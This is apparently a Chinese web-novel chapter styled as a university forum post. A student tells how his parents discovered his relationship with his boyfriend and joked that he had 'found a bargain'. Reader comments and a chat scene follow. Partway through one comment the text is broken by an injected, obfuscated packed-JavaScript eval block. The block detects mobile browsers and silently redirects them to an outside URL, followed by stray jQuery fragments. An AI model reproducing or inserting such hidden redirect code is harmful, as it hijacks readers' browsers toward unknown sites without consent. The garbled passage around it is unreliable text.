标题:【树洞】家里人知道我们在一起了,我妈说“你捡到漏了”
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
兄弟们。
我回来了。
寒假过去两周了。
这两周发生了很多事。
但最让我没想到的一件事是——
我爸妈知道我和顾辞在一起了。
不是我们主动说的。
是被发现的。
——
事情要从上周说起。
我在家和顾辞视频,聊得正开心。
我妈突然推门进来,问我要不要吃水果。
我一紧张,把手机扣在胸口。
但还是晚了。
我妈看见屏幕上的顾辞了。
她愣了一下,然后说:“哎,这不是小顾吗?你们视频呢?”
我说:“啊……对。”
她说:“那你们聊,我放这儿了。”
她把水果放下,出去了。
我以为没事了。
结果晚上吃饭的时候,她突然问我:
“张扬,你是不是和小顾谈恋爱呢?”
我一口饭差点喷出来。
——
我爸妈坐在对面,看着我。
我爸面无表情,我妈眼睛亮亮的。
我脑子飞速转。
想编个理由混过去。
但转念一想,算了。
反正迟早要知道的。
我说:“是。”
我妈眼睛更亮了。
我爸还是面无表情。
沉默了三秒。
然后我妈说:“我就说嘛!”
“上次你回来,一直小顾长小顾短的。”
“视频的时候笑得那个傻样。”
“还用说?肯定有问题!”
我:“……”
我爸还是没说话。
——
我看向我爸。
他终于开口了。
“那个小顾,是文学院的?”
我说:“是。”
“年级第一那个?”
我说:“是。”
“长得挺好看那个?”
我说:“……是。”
他又沉默了。
然后他说:
“你配得上人家吗?”
我:“……”
我妈在旁边笑出了声。
——
我妈笑得不行,拍着我爸说:“你怎么这么说话!”
然后转过来看着我。
那眼神,怎么说呢。
不是生气,不是失望。
是一种……很复杂的、我说不清的眼神。
然后她说:
“张扬啊。”
“嗯?”
“你知道你是什么水平吗?”
我愣住了。
她说:“你从小学习就一般,考大学靠的是体育特招。”
“长得吧,也不算特别帅,就高点。”
“性格呢,大大咧咧的,没什么心眼。”
“你这样的,能找到小顾那样的?”
“那是你捡到漏了你知道吗?”
我:“……”
我妈继续说:“小顾那孩子我见过几次,长得好看,学习好,有礼貌,家里条件也好。”
“人家能看上你,你就偷着乐吧。”
“以后对人家好点,别欺负人家。”
我张了张嘴,不知道该说什么。
我爸在旁边补了一句:
“欺负人家,我揍你。”
我:“……”
——
操。
兄弟们。
你们能想象吗?
我以为出柜会是什么大场面。
我以为我爸妈会震惊、会沉默、会需要时间接受。
结果呢?
我妈说“你捡到漏了”。
我爸说“你配得上人家吗”。
他们担心的根本不是我和男的谈恋爱。
他们担心的是——人家那么优秀,怎么会看上我这个傻儿子。
我该高兴还是该难过?
——
吃完饭,我妈拉着我聊天。
问我顾辞喜欢吃什么,喜欢做什么,家里几口人,以后有什么打算。
我一一回答。
她听着听着,突然叹了口气。
“张扬啊。”
“嗯?”
“妈不是不同意你们。”
“妈就是……有点不敢相信。”
“人家那么好的孩子,怎么就跟你了呢?”
我:“……”
她说:“你得对人家好。”
“不能像对妈似的,三天两头惹我生气。”
“人家是读书人,你得让着点。”
“吵架了先道歉,别死要面子。”
“多关心人家,天冷了提醒加衣服,饿了给买吃的。”
“记住了吗?”
我说:“记住了。”
她又叹了口气。
“你捡到这么大的漏,得珍惜啊。”
——
晚上我给顾辞打电话,说了今天的事。
他听完,沉默了一会儿。
然后他说:“你妈……真这么说?”
我说:“真的。”
他又沉默了。
然后我听见他在那边轻轻笑了一声。
“你妈说得对。”
“什么?”
“你是捡到漏了。”
我愣了一下。
然后我笑了。
“那你是漏吗?”
他说:“不是。”
“我是漏网的那条鱼。”
“正好被你捞着了。”
我听完,愣了一下,然后说:
“操,你怎么这么会说话。”
——
现在我在床上,盯着手机。
满脑子都是今天的事。
我妈说我捡到漏了。
我爸问我配不配。
顾辞说他是漏网的那条鱼。
我突然觉得——
可能我真的捡到漏了。
毕竟那么好的一个人,怎么就跟我了呢?
——
1楼匿名用户:
沙发!
楼主你今天又是来喂狗粮的!
2楼匿名用户:
哈哈哈哈哈哈笑死我了!
“你配得上人家吗?”
“那是你捡到漏了你知道吗?”
叔叔阿姨太真实了!!!
3楼匿名用户:
这就是亲爸妈的反应啊!!!
担心的不是儿子喜欢男的,是儿子配不配得上人家!!!
4楼匿名用户:
我妈要是知道我找顾辞这样的,肯定也这么说。
“人家能看上你?你做梦呢?”
5楼匿名用户:
楼主你妈太可爱了!
“人家那么好的孩子,怎么就跟你了呢?”
这句话我笑死!
6楼匿名用户:
我爸补的那句“欺负人家我揍你”更绝!
这是亲爸!
7楼匿名用户:
但说实话,叔叔阿姨这个反应,已经很好了。
没有反对,没有震惊,没有需要时间接受。
直接就接受了。
甚至还觉得是自己儿子高攀了。
8楼匿名用户:
对对对!
这个态度说明什么?
说明他们知道顾辞有多好!
说明他们认可顾辞!
说明他们相信儿子的眼光!
9楼匿名用户:
而且你妈说的那些话——
“对人家好点”
“让着点”
“吵架了先道歉”
“多关心人家”
这不是妈妈对儿子说的恋爱箴言吗!
和儿女性别没关系!
10楼匿名用户:
呜呜呜呜呜!
赛博父母感动了!
真正的父母也这么好!
11楼匿名用户:
等等,楼主最后那句“操,你怎么这么会说话”
我数了一下,这是这个帖子里第几个“操”了?
12楼匿名用户:
回11楼:我来统计一下!
第一章:2个
第二章:3个
第三章:4个
第四章:5个
第五章:3个
第六章:2个
第七章:3个
第八章:5个</
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382531|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
p>
第九章:2个
第十章:3个
第十一章:3个
第十二章:2个
第十三章:2个
第十四章:2个(目前)
总数:41个!
13楼匿名用户:
哈哈哈哈哈哈笑死!
赛博父母为了统计一个“操”字,开始用软件分析了!
14楼匿名用户:
这说明什么?
说明我们是真的很闲!
也说明楼主的语言习惯真的很稳定!
15楼匿名用户:
软件分析计算33次,平均每章2-3次。
这个频率很科学!
18楼匿名用户:
@足球不行踢球去楼主,你对自己的“操”字使用频率有什么想说的吗?
19楼楼主:
……
你们是真的闲。
我自己都不知道用了多少次。
20楼匿名用户:
回19楼:33次!
我们帮你统计出来了!
以后可以写进你的语言习惯分析报告!
21楼匿名用户:
话说顾辞那句“我是漏网的那条鱼,正好被你捞着了”
太会了!!!
这个比喻绝了!!!
22楼匿名用户:
对!
而且楼主听完就愣住了!
说明被撩到了!
23楼匿名用户:
楼主现在已经不是那个“我是直男”的楼主了。
楼主现在是“被男朋友撩到说不出话”的楼主。
24楼匿名用户:
哈哈哈哈哈哈!
这个进化路线很清晰!
25楼匿名用户:
话说回来,顾辞那边还没跟他爸妈说?
打算什么时候说?
26楼楼主:
他打算开学再说。
他爸妈比较传统,他想当面说。
27楼匿名用户:
理解。
这种事确实当面说比较好。
28楼匿名用户:
希望顾辞爸妈也能像你爸妈一样开明!
29楼楼主:
希望吧。
30楼匿名用户:
不管怎么样,你都会陪着他的,对吧?
31楼楼主:
嗯。
一直陪着。
32楼匿名用户:
行了,儿子今天表现很好。
继续对顾辞好!
别辜负人家!
33楼楼主:
好。
谢谢你们。
——
【最后的最后】
张扬躺在床上,看着手机。
想起今天的事,还是觉得有点不可思议。
他以为出柜会很难。
结果他爸妈比他想象的还好。
妈妈说张扬捡到漏了。
爸爸问自己配不配。
他们担心的不是自己儿子,是能不能对得起这么好的顾辞。
手机震了一下。
【圆圆】:睡了吗?
【张】:没。
【圆圆】:在想今天的事?
【张】:嗯。
【圆圆】:你妈真的挺好的。
【张】:嗯。
【张】:顾辞。
【圆圆】:嗯?
【张】:我妈说让我对你好点。
【张】:吵架了先道歉。
【张】:多关心你。
【张】:天冷了提醒加衣服。
【张】:饿了给买吃的。
【圆圆】:……
【圆圆】:你妈说的都对。
【张】:那我以后都照做。
【张】:对你好点。
【张】:吵架了先道歉。
【张】:多关心你。
【张】:天冷了提醒加衣服。
【张】:饿了给买吃的。
【圆圆】:好。
【圆圆】:那你记得。
【张】:记得。
【张】:一辈子都记得。
——
“你捡到漏了,得珍惜。”
是的。
会珍惜。
一辈子。